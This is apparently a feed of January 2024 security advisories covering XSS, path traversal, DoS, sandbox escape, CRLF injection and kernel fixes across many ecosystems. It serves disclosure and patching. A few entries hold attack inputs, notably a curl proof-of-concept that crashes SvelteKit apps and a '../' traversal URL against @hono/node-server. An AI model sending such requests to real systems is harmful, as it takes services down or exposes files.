https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-V9WR-2XRG-V7W8

23.01.2024 22:11:20 | maven | [MAVEN:GHSA-V435-PFJ6-68R3] Cross-site Scripting in JFinal (moderate)
Cross Site Scripting (XSS) vulnerability in JFinalcms 5.0.0 allows attackers to run arbitrary code via the /admin/login username parameter.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-V435-PFJ6-68R3

23.01.2024 20:26:40 | go | [GO-2024-2471] Chain halt panic in github.com/cometbft/cometbft
A vulnerability in CometBFT's validation logic for VoteExtensionsEnableHeight can result in a chain halt when triggered through a governance parameter change proposal on an ABCI2 Application Chain. If a parameter change proposal including a VoteExtensionsEnableHeight modification is passed, nodes running the affected versions may panic, halting the network.
https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2471

23.01.2024 16:43:50 | maven | [MAVEN:GHSA-9VM7-V8WJ-3FQW] keycloak-core: open redirect via "form_post.jwt" JARM response mode (moderate)
An incomplete fix was found in the Keycloak Core patch. An attacker can steal authorization codes or tokens from clients using a wildcard in the JARM response mode "form_post.jwt". It is observed that changing the response_mode parameter in the original proof of concept from "form_post" to "form_post.jwt" can bypass the security patch implemented to address CVE-2023-6134.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-9VM7-V8WJ-3FQW

23.01.2024 16:43:14 | npm | [NPM:GHSA-4C2G-HX49-7H25] Prototype pollution not blocked by object-path related utilities in hoolock (moderate)

### Impact
Utility functions related to object paths (`get`, `set` and `update`) did not block attempts to access or alter object prototypes.

### Patches
The `get`, `set` and `update` functions will throw a `TypeError` when a user attempts to access or alter inherited properties in versions >=2.2.1.

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-4C2G-HX49-7H25

23.01.2024 16:42:52 | npm | [NPM:GHSA-RJQ5-W47X-X359] @hono/node-server cannot handle "double dots" in URL (moderate)

### Impact
Since v1.3.0, we use our own Request object. This is great, but the `url` behavior is unexpected.

In the standard API, if the URL contains `..`, here called "double dots", the URL string returned by Request will be in the resolved path.

```ts
const req = new Request('http://localhost/static/../foo.txt') // Web-standards
console.log(req.url) // http://localhost/foo.txt
```

However, the `url` in our Request does not resolve double dots, so `http://localhost/static/../foo.txt` is returned.

```ts
const req = new Request('http://localhost/static/../foo.txt')
console.log(req.url) // http://localhost/static/../foo.txt
```

It will pass unresolved paths to the web application. This causes vulnerabilities like #123 when using `serveStatic`.

Note: Modern web browsers and the latest `curl` command resolve double dots on the client side, so it does not affect you if the user uses them. However, problems may occur if accessed by a client that does not resolve them.

### Patches
"v1.4.1" includes the change to fix this issue.

### Workarounds
Don't use `serveStatic`.

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-RJQ5-W47X-X359

23.01.2024 15:39:22 | ubuntu | [USN-6595-1] PyCryptodome vulnerability (medium)
PyCryptodome could be made to expose sensitive information.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6595-1

23.01.2024 05:05:16 | ubuntu | [USN-6594-1] Squid vulnerabilities (high)
Several security issues were fixed in Squid.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6594-1

23.01.2024 02:00:00 | cisa | [CISA-2024:0123] CISA Adds One Known Exploited Vulnerability to Catalog
CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0123

23.01.2024 02:00:00 | debian | [DSA-5603-1] xorg-server (high)
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5603-1

23.01.2024 02:00:00 | debian | [DSA-5604-1] openjdk-11 (high)
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5604-1

23.01.2024 02:00:00 | oraclelinux | [ELSA-2024-0266] java-11-openjdk security update (important)
[1:11.0.22.0.7-2.0.1]
- Update to openjdk-11.0.22+7
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0266

23.01.2024 02:00:00 | oraclelinux | [ELSA-2024-0343] LibRaw security update (moderate)
[0.19.4-2]
- Fix CVE-2021-32142
- Resolves: RHEL-9524
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0343

23.01.2024 02:00:00 | oraclelinux | [ELSA-2024-0345] python-pillow security update (moderate)
[2.0.0-24gitd1c6db8]
- Security fix for CVE-2023-44271
  Resolves: RHEL-15459
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0345

23.01.2024 16:44:08 | maven | [MAVEN:GHSA-R4Q3-7G4Q-X89M] Spring Framework server Web DoS Vulnerability (high)
In Spring Framework versions 6.0.15 and 6.1.2, it is possible for a user to provide specially crafted HTTP requests that may cause a denial-of-service (DoS) condition.
Specifically, an application is vulnerable when all of the following are true:
* the application uses Spring MVC
* Spring Security 6.1.6+ or 6.2.1+ is on the classpath
Typically, Spring Boot applications need the org.springframework.boot:spring-boot-starter-web and org.springframework.boot:spring-boot-starter-security dependencies to meet all conditions.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-R4Q3-7G4Q-X89M

23.01.2024 16:36:58 | maven | [MAVEN:GHSA-FRXM-V7Q3-V2WV] Insertion of Sensitive Information into Log File in OWASP DependencyCheck (moderate)
DependencyCheck for Maven 9.0.0 to 9.0.6, for CLI version 9.0.0 to 9.0.5, and for Ant versions 9.0.0 to 9.0.5, when used in debug mode, allows an attacker to recover the NVD API Key from a log file.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-FRXM-V7Q3-V2WV

23.01.2024 16:35:55 | maven | [MAVEN:GHSA-HV5G-Q4H3-64Q4] Hard-coded credentials in org.folio:mod-remote-storage (moderate)
Hard-coded credentials in mod-remote-storage versions under 1.7.2 and from 2.0.0 to 2.0.3 allow unauthorized users to gain read access to mod-inventory-storage records including instances, holdings, items, contributor-types, and identifier-types.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-HV5G-Q4H3-64Q4

23.01.2024 16:36:37 | maven | [MAVEN:GHSA-HFJ8-63C8-RMFW] Inefficient Algorithmic Complexity in com.upokecenter:cbor (high)
Inefficient algorithmic complexity in the DecodeFromBytes function in the com.upokecenter.cbor Java implementation of Concise Binary Object Representation (CBOR) versions 4.0.0 to 4.5.1 allows an attacker to cause a denial of service by passing a maliciously crafted input. Depending on an application's use of this library, this may be a remote attacker.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-HFJ8-63C8-RMFW

23.01.2024 16:36:15 | maven | [MAVEN:GHSA-GVC7-GJRW-HJ65] Improper Verification of Cryptographic Signature in aws-encryption-sdk-java (moderate)
AWS Encryption SDK for Java versions 2.0.0 to 2.2.0 and less than 1.9.0 incorrectly validates some invalid ECDSA signatures.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-GVC7-GJRW-HJ65

23.01.2024 16:35:12 | maven | [MAVEN:GHSA-WC6F-QJXC-622V] JavaScript execution via malicious molfiles (XSS) (moderate)
MolecularFaces before 0.3.0 is vulnerable to cross site scripting. A remote attacker can execute arbitrary JavaScript in the context of a victim browser via crafted molfiles.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-WC6F-QJXC-622V

23.01.2024 16:34:55 | maven | [MAVEN:GHSA-3P77-WG4C-QM24] Exposure of sensitive information in ClickHouse (moderate)
Exposure of sensitive information in exceptions in ClickHouse's clickhouse-r2dbc, com.clickhouse:clickhouse-jdbc, and com.clickhouse:clickhouse-client versions less than 0.4.6 allows unauthorized users to gain access to client certificate passwords via client exception logs. This occurs when 'sslkey' is specified and an exception, such as a ClickHouseException or SQLException, is thrown during database operations; the certificate password is then included in the logged exception message.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-3P77-WG4C-QM24

23.01.2024 16:34:39 | maven | [MAVEN:GHSA-23RX-79R7-6CPX] Sandbox escape in Artemis Java Test Sandbox (moderate)
Artemis Java Test Sandbox versions less than 1.7.6 are vulnerable to a sandbox escape when an attacker crafts a special subclass of InvocationTargetException. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-23RX-79R7-6CPX

23.01.2024 16:45:36 | rustsec | [RUSTSEC-2024-0007] Use-after-free when setting the locale
Version 3.0.0 introduced an `AtomicStr` type that is used to store the current locale. It stores the locale as a raw pointer to an `Arc<String>`. The locale can be read with `AtomicStr::as_str()`.
`AtomicStr::as_str()` does not increment the usage counter of the `Arc`. If the locale is changed in one thread, another thread can have a stale -- possibly already freed -- reference to the stored string.
https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0007

23.01.2024 22:10:33 | maven | [MAVEN:GHSA-32Q4-86G8-6637] Stored Cross Site Scripting in beetl-bbs (moderate)
A Stored Cross Site Scripting (XSS) vulnerability in beetl-bbs 2.0 allows attackers to run arbitrary code via the post/save content parameter.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-32Q4-86G8-6637

23.01.2024 22:11:07 | maven | [MAVEN:GHSA-H57W-VH34-F8CW] Code injection in mingSoft MCMS (high)
An issue in mingSoft MCMS v.5.2.4 allows a remote attacker to obtain sensitive information via a crafted script to the password parameter.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-H57W-VH34-F8CW

23.01.2024 16:38:05maven[MAVEN:GHSA-859H-4W58-78XW] Cross-site Scripting in JFinal (moderate)A stored XSS vulnerability exists in JFinalcms 5.0.0 via the /gusetbook/save contact parameter, which allows remote attackers to inject arbitrary web script or HTML.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-859H-4W58-78XW
23.01.2024 16:37:45maven[MAVEN:GHSA-3J4X-9Q9Q-3277] Cross-site Scripting in JFinal (moderate)A stored XSS vulnerability exists in JFinalcms 5.0.0 via the /gusetbook/save content parameter, which allows remote attackers to inject arbitrary web script or HTML.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-3J4X-9Q9Q-3277
24.01.2024 23:52:44 | maven | [MAVEN:GHSA-QJPF-2JHX-3758] Arbitrary file read vulnerability in Jenkins Log Command Plugin (high) | Jenkins Log Command Plugin 1.0.2 and earlier does not disable a feature of its command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read content from arbitrary files on the Jenkins controller file system. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-QJPF-2JHX-3758
24.01.2024 23:52:44 | maven | [MAVEN:GHSA-X22X-5PP9-8V7F] Content-Security-Policy disabled by Red Hat Dependency Analytics Jenkins Plugin (high) | Jenkins sets the Content-Security-Policy header to static files served by Jenkins (specifically DirectoryBrowserSupport), such as workspaces, /userContent, or archived artifacts, unless a Resource Root URL is specified. Red Hat Dependency Analytics Plugin 0.7.1 and earlier globally disables the Content-Security-Policy header for static files served by Jenkins whenever the 'Invoke Red Hat Dependency Analytics (RHDA)' build step is executed. This allows cross-site scripting (XSS) attacks by users with the ability to control files in workspaces, archived artifacts, etc. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-X22X-5PP9-8V7F
24.01.2024 23:50:52 | maven | [MAVEN:GHSA-F67F-2J6R-M4C9] Non-constant time webhook token comparison in Jenkins GitLab Branch Source Plugin (low) | Jenkins GitLab Branch Source Plugin 684.vea_fa_7c1e2fe3 and earlier uses a non-constant time comparison function when checking whether the provided and expected webhook token are equal, potentially allowing attackers to use statistical methods to obtain a valid webhook token. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-F67F-2J6R-M4C9
24.01.2024 23:50:27 | maven | [MAVEN:GHSA-8R93-59CF-358F] CSRF vulnerability in Jenkins GitLab Branch Source Plugin (moderate) | A cross-site request forgery (CSRF) vulnerability in Jenkins GitLab Branch Source Plugin 684.vea_fa_7c1e2fe3 and earlier allows attackers to connect to an attacker-specified URL. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8R93-59CF-358F
24.01.2024 23:49:52 | maven | [MAVEN:GHSA-FW9H-CXX9-GFQ3] Shared projects are unconditionally discovered by Jenkins GitLab Branch Source Plugin (moderate) | Jenkins GitLab Branch Source Plugin 684.vea_fa_7c1e2fe3 and earlier unconditionally discovers projects that are shared with the configured owner group, allowing attackers to configure and share a project, resulting in a crafted Pipeline being built by Jenkins during the next scan of the group. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-FW9H-CXX9-GFQ3
24.01.2024 23:48:53 | maven | [MAVEN:GHSA-CJGM-9VC9-56MX] Path traversal vulnerability in Jenkins Matrix Project Plugin (moderate) | Jenkins Matrix Project Plugin 822.v01b_8c85d16d2 and earlier does not sanitize user-defined axis names of multi-configuration projects, allowing attackers with Item/Configure permission to create or replace any config.xml files on the Jenkins controller file system with content not controllable by the attackers. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-CJGM-9VC9-56MX
24.01.2024 23:45:59 | maven | [MAVEN:GHSA-VPH5-2Q33-7R9H] Arbitrary file read vulnerability in Git server Plugin can lead to RCE (high) | Jenkins Git server Plugin 99.va_0826a_b_cdfa_d and earlier does not disable a feature of its command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing attackers with Overall/Read permission to read content from arbitrary files on the Jenkins controller file system. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-VPH5-2Q33-7R9H
24.01.2024 18:00:00 | cisco | [CISCO-SA-SB-BUS-ACL-BYPASS-5ZN9HNJK] Cisco Small Business Series Switches Stacked Reload ACL Bypass Vulnerability (medium) | A vulnerability with the access control list (ACL) management within a stacked switch configuration of Cisco Business 250 Series Smart Switches and Business 350 Series Managed Switches could allow an unauthenticated, remote attacker to bypass protection offered by a configured ACL on an affected device. This vulnerability is due to incorrect processing of ACLs on a stacked configuration when either the primary or backup switches experience a full stack reload or power cycle. An attacker could exploit this vulnerability by sending crafted traffic through an affected device. A successful exploit could allow the attacker to bypass configured ACLs, causing traffic to be dropped or forwarded in an unexpected manner. The attacker does not have control over the conditions that result in the device being in the vulnerable state. Note: In the vulnerable state, the ACL would be correctly applied on the primary devices but could be incorrectly applied to the backup devices. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. | https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SB-BUS-ACL-BYPASS-5ZN9HNJK
24.01.2024 18:00:00 | cisco | [CISCO-SA-CUCM-RCE-BWNZQCUM] Cisco Unified Communications Products Remote Code Execution Vulnerability (critical) | A vulnerability in multiple Cisco Unified Communications and Contact Center Solutions products could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. This vulnerability is due to the improper processing of user-provided data that is being read into memory. An attacker could exploit this vulnerability by sending a crafted message to a listening port of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the privileges of the web services user. With access to the underlying operating system, the attacker could also establish root access on the affected device. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. | https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CUCM-RCE-BWNZQCUM
24.01.2024 18:00:00 | cisco | [CISCO-SA-CUC-XSS-9TFUU5MS] Cisco Unity Connection Cross-Site Scripting Vulnerability (medium) | A vulnerability in the web-based management interface of Cisco Unity Connection could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. | https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CUC-XSS-9TFUU5MS
24.01.2024 21:13:38 | npm | [NPM:GHSA-G5M6-HXPP-FC49] Sending a GET or HEAD request with a body crashes SvelteKit (high) | Summary: In SvelteKit 2, sending a GET request with a body (e.g. `{}`) to a SvelteKit app in preview or with `adapter-node` throws `Request with GET/HEAD method cannot have body.` and crashes the app. Reported output: `node:internal/deps/undici/undici:6066 throw new TypeError("Request with GET/HEAD method cannot have body."); ^ TypeError: Request with GET/HEAD method cannot have body. at new Request (node:internal/deps/undici/undici:6066:17) at getRequest (file:///C:/Users/admin/Desktop/reproduction/node_modules/@sveltejs/kit/src/exports/node/index.js:107:9) at file:///C:/Users/admin/Desktop/reproduction/node_modules/@sveltejs/kit/src/exports/vite/preview/index.js:181:26 at call (file:///C:/Users/admin/Desktop/reproduction/node_modules/vite/dist/node/chunks/dep-9A4-l-43.js:44795:7) at next (file:///C:/Users/admin/Desktop/reproduction/node_modules/vite/dist/node/chunks/dep-9A4-l-43.js:44739:5) at file:///C:/Users/admin/Desktop/reproduction/node_modules/@sveltejs/kit/src/exports/vite/preview/index.js:172:6 at call (file:///C:/Users/admin/Desktop/reproduction/node_modules/vite/dist/node/chunks/dep-9A4-l-43.js:44795:7) at next (file:///C:/Users/admin/Desktop/reproduction/node_modules/vite/dist/node/chunks/dep-9A4-l-43.js:44739:5) at file:///C:/Users/admin/Desktop/reproduction/node_modules/@sveltejs/kit/src/exports/vite/preview/index.js:211:27 at call (file:///C:/Users/admin/Desktop/reproduction/node_modules/vite/dist/node/chunks/dep-9A4-l-43.js:44795:7) Node.js v20.11.0`. `TRACE` requests will also cause the app to crash. Prerendered pages and SvelteKit 1 apps are not affected. PoC: First do a fresh install of SvelteKit 2 with the example app (TypeScript). 1. `npm run build` 2. `npm run preview` 3. Go to http://localhost:4173 (works) 4. `curl -X GET -d "{}" http://localhost:4173/bye` 5. The application crashes and http://localhost:4173 is down. Impact: Denial of Service for apps using `adapter-node`. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-G5M6-HXPP-FC49
24.01.2024 13:12:41 | ubuntu | [USN-6596-1] Apache::Session::LDAP vulnerability (high) | Apache::Session::LDAP could be made to expose sensitive information through spoofing if it received an invalid X.509 certificate. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6596-1
24.01.2024 16:22:04 | maven | [MAVEN:GHSA-QH2W-9M7W-HJG2] Cross-site Scripting in JFinal (moderate) | Cross Site Scripting (XSS) vulnerability in the /admin/login password parameter in JFinalcms 5.0.0 allows attackers to run arbitrary code via a crafted URL. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-QH2W-9M7W-HJG2
24.01.2024 19:00:49 | rustsec | [RUSTSEC-2024-0008] Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting') (medium) | Summary: Insufficient validation of outbound header values may lead to request splitting or response splitting attacks in scenarios where attackers have sufficient control over outbound headers. Details: Outbound `trillium_http::HeaderValue` and `trillium_http::HeaderName` can be constructed infallibly and were not checked for illegal bytes when sending requests. Thus, if an attacker has sufficient control over header values (or names) in a request that they could inject `\r\n` sequences, they could get the client and server out of sync, and then pivot to gain control over other parts of requests or responses (i.e. exfiltrating data from other requests, SSRF, etc.). Patches: trillium-client >= 0.5.4: if any header name or header value is invalid in the client request headers, awaiting the client Conn returns an `Error::MalformedHeader` prior to any network access. Workarounds: trillium client applications should sanitize or validate untrusted input that is included in header values and header names. Carriage return, newline, and null characters are not allowed. Impact: This only affects use cases where attackers have control of outbound headers, and can insert "\r\n" sequences. Specifically, if untrusted and unvalidated input is inserted into header names or values. Credit: Discovered and reported by [@divergentdave](https://github.com/divergentdave). | https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0008
24.01.2024 19:00:49 | rustsec | [RUSTSEC-2024-0009] Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting') (medium) | Summary: Insufficient validation of outbound header values may lead to request splitting or response splitting attacks in scenarios where attackers have sufficient control over outbound headers. Details: Outbound `trillium_http::HeaderValue` and `trillium_http::HeaderName` can be constructed infallibly and were not checked for illegal bytes when sending responses from the server. Thus, if an attacker has sufficient control over header values (or names) in an outbound response that they could inject `\r\n` sequences, they could get the client and server out of sync, and then pivot to gain control over other parts of requests or responses (i.e. exfiltrating data from other requests, SSRF, etc.). Patches: trillium-http >= 0.3.12: if a header name is invalid in server response headers, the specific header and any associated values are omitted from network transmission; if a header value is invalid in server response headers, the individual header value is omitted from network transmission, and other header values with the same header name will still be sent. Workarounds: trillium services should sanitize or validate untrusted input that is included in header values and header names. Carriage return, newline, and null characters are not allowed. Impact: This only affects use cases where attackers have control of outbound headers, and can insert "\r\n" sequences. Specifically, if untrusted and unvalidated input is inserted into header names or values. Credit: Discovered and reported by [@divergentdave](https://github.com/divergentdave). | https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0009
26.01.2024 02:10:39 | ubuntu | [USN-6609-1] Linux kernel vulnerabilities (high) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6609-1
26.01.2024 01:50:17 | ubuntu | [USN-6608-1] Linux kernel vulnerabilities (high) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6608-1
26.01.2024 01:35:20 | ubuntu | [USN-6607-1] Linux kernel (Azure) vulnerabilities (high) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6607-1
26.01.2024 00:11:29 | ubuntu | [USN-6606-1] Linux kernel (OEM) vulnerabilities (high) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6606-1
26.01.2024 00:06:42 | ubuntu | [USN-6605-1] Linux kernel vulnerabilities (high) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6605-1
25.01.2024 23:06:58 | ubuntu | [USN-6604-1] Linux kernel vulnerabilities (high) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6604-1
25.01.2024 22:24:48 | ubuntu | [USN-6603-1] Linux kernel (AWS) vulnerabilities (high) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6603-1
25.01.2024 22:15:48 | ubuntu | [USN-6602-1] Linux kernel vulnerabilities (high) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6602-1
25.01.2024 21:32:56 | ubuntu | [USN-6601-1] Linux kernel vulnerability (high) | The system could be made to crash or run programs as an administrator. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6601-1
25.01.2024 20:32:58 | ubuntu | [USN-6600-1] MariaDB vulnerabilities (medium) | Several security issues were fixed in MariaDB. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6600-1
25.01.2024 18:06:46 | ubuntu | [USN-6599-1] Jinja2 vulnerabilities (medium) | Several security issues were fixed in Jinja2. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6599-1
25.01.2024 14:44:31 | ubuntu | [USN-6598-1] Paramiko vulnerability (medium) | A protocol flaw was fixed in Paramiko. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6598-1
25.01.2024 14:38:55 | ubuntu | [USN-6597-1] Puma vulnerability (high) | Puma could be made to consume resources if it received specially crafted network traffic. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6597-1
25.01.2024 10:00:00 | msrc | [MS:CVE-2024-0804] Chromium: CVE-2024-0804 Insufficient policy enforcement in iOS Security UI | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0804
25.01.2024 10:00:00 | msrc | [MS:CVE-2024-0805] Chromium: CVE-2024-0805 Inappropriate implementation in Downloads | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0805
25.01.2024 10:00:00 | msrc | [MS:CVE-2024-0806] Chromium: CVE-2024-0806 Use after free in Passwords | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0806
25.01.2024 10:00:00 | msrc | [MS:CVE-2024-0807] Chromium: CVE-2024-0807 Use after free in WebAudio | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0807
25.01.2024 10:00:00 | msrc | [MS:CVE-2024-0808] Chromium: CVE-2024-0808 Integer underflow in WebUI | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0808
25.01.2024 10:00:00 | msrc | [MS:CVE-2024-0809] Chromium: CVE-2024-0809 Inappropriate implementation in Autofill | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0809
25.01.2024 10:00:00 | msrc | [MS:CVE-2024-0810] Chromium: CVE-2024-0810 Insufficient policy enforcement in DevTools | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0810
25.01.2024 10:00:00 | msrc | [MS:CVE-2024-0811] Chromium: CVE-2024-0811 Inappropriate implementation in Extensions API | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0811
25.01.2024 10:00:00 | msrc | [MS:CVE-2024-0812] Chromium: CVE-2024-0812 Inappropriate implementation in Accessibility | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0812
25.01.2024 10:00:00 | msrc | [MS:CVE-2024-0813] Chromium: CVE-2024-0813 Use after free in Reading Mode | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0813
25.01.2024 10:00:00 | msrc | [MS:CVE-2024-0814] Chromium: CVE-2024-0814 Incorrect security UI in Payments | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0814
25.01.2024 10:00:00 | msrc | [MS:CVE-2024-21326] Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21326
25.01.2024 10:00:00 | msrc | [MS:CVE-2024-21382] Microsoft Edge for Android Information Disclosure Vulnerability (moderate) | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21382
25.01.2024 10:00:00 | msrc | [MS:CVE-2024-21383] Microsoft Edge (Chromium-based) Spoofing Vulnerability (low) | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21383
25.01.2024 10:00:00 | msrc | [MS:CVE-2024-21385] Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21385
25.01.2024 10:00:00 | msrc | [MS:CVE-2024-21387] Microsoft Edge for Android Spoofing Vulnerability (moderate) | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21387
25.01.2024 02:00:00 | oraclelinux | [ELSA-2024-0387] php:8.1 security update (moderate) | php: [8.1.27-1] rebase to 8.1.27 RHEL-19093; [8.1.14-1] rebase to 8.1.14; [8.1.8-1] update to 8.1.8 #2070040; [8.1.7-2] clean unneeded dependency on useradd command; [8.1.7-1] update to 8.1.7 #2070040; [8.1.6-2] add upstream patch to initialize pcre before mbstring, add upstream patch to use more sha256 in openssl tests; [8.1.6-1] update to 8.1.6 #2070040. php-pecl-apcu: [5.1.21-1] update to 5.1.21 for PHP 8.1 #2070040. php-pecl-rrd: [2.0.3-4] build for PHP 8.1 #2070040. php-pecl-xdebug3: [3.1.4-1] update to 3.1.4 for PHP 8.1 #2070040. php-pecl-zip: [1.20.1-1] update to 1.20.1 for PHP 8.1 #2070040. | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0387
25.01.2024 02:00:00 | oraclelinux | [ELSA-2024-0463] rpm security update (moderate) | [4.16.1.3-27] TOCTOU race in checks for unsafe symlinks (CVE-2021-35937); races with chown/chmod/capabilities calls during installation (CVE-2021-35938); checks for unsafe symlinks are not performed for intermediary directories (CVE-2021-35939). | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0463
25.01.2024 02:00:00 | oraclelinux | [ELSA-2024-0464] python-urllib3 security update (moderate) | [1.26.5-3.0.1.1] Security fix for CVE-2023-45803 (Resolves: RHEL-16874); Security fix for CVE-2023-43804 (Resolves: RHEL-12001). | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0464
25.01.2024 02:00:00 | oraclelinux | [ELSA-2024-0465] sqlite security update (moderate) | [3.34.1-7] Fixes CVE-2023-7104. | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0465
25.01.2024 02:00:00 | oraclelinux | [ELSA-2024-0466] python3.9 security update (moderate) | [3.9.18-1.1] Security fix for CVE-2023-27043 (Resolves: RHEL-20613). | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0466
25.01.2024 02:00:00 | oraclelinux | [ELSA-2024-0474] tomcat security update (moderate) | [1:9.0.62-37.el9_3.1] Resolves: #2235370 CVE-2023-41080 tomcat: Open Redirect vulnerability in FORM authentication; Resolves: #2243749 CVE-2023-45648 tomcat: incorrectly parsed http trailer headers can cause request smuggling; Resolves: #2243751 CVE-2023-42794 tomcat: FileUpload: DoS due to accumulation of temporary files on Windows; Resolves: #2243752 CVE-2023-42795 tomcat: improper cleaning of recycled objects could lead to information leak. | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0474
25.01.2024 02:00:00 | redhat | [RHSA-2024:0463] rpm security update (moderate) | The RPM Package Manager (RPM) is a command-line driven package management system capable of installing, uninstalling, verifying, querying, and updating software packages. Security Fix(es): rpm: TOCTOU race in checks for unsafe symlinks (CVE-2021-35937); rpm: races with chown/chmod/capabilities calls during installation (CVE-2021-35938); rpm: checks for unsafe symlinks are not performed for intermediary directories (CVE-2021-35939). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0463
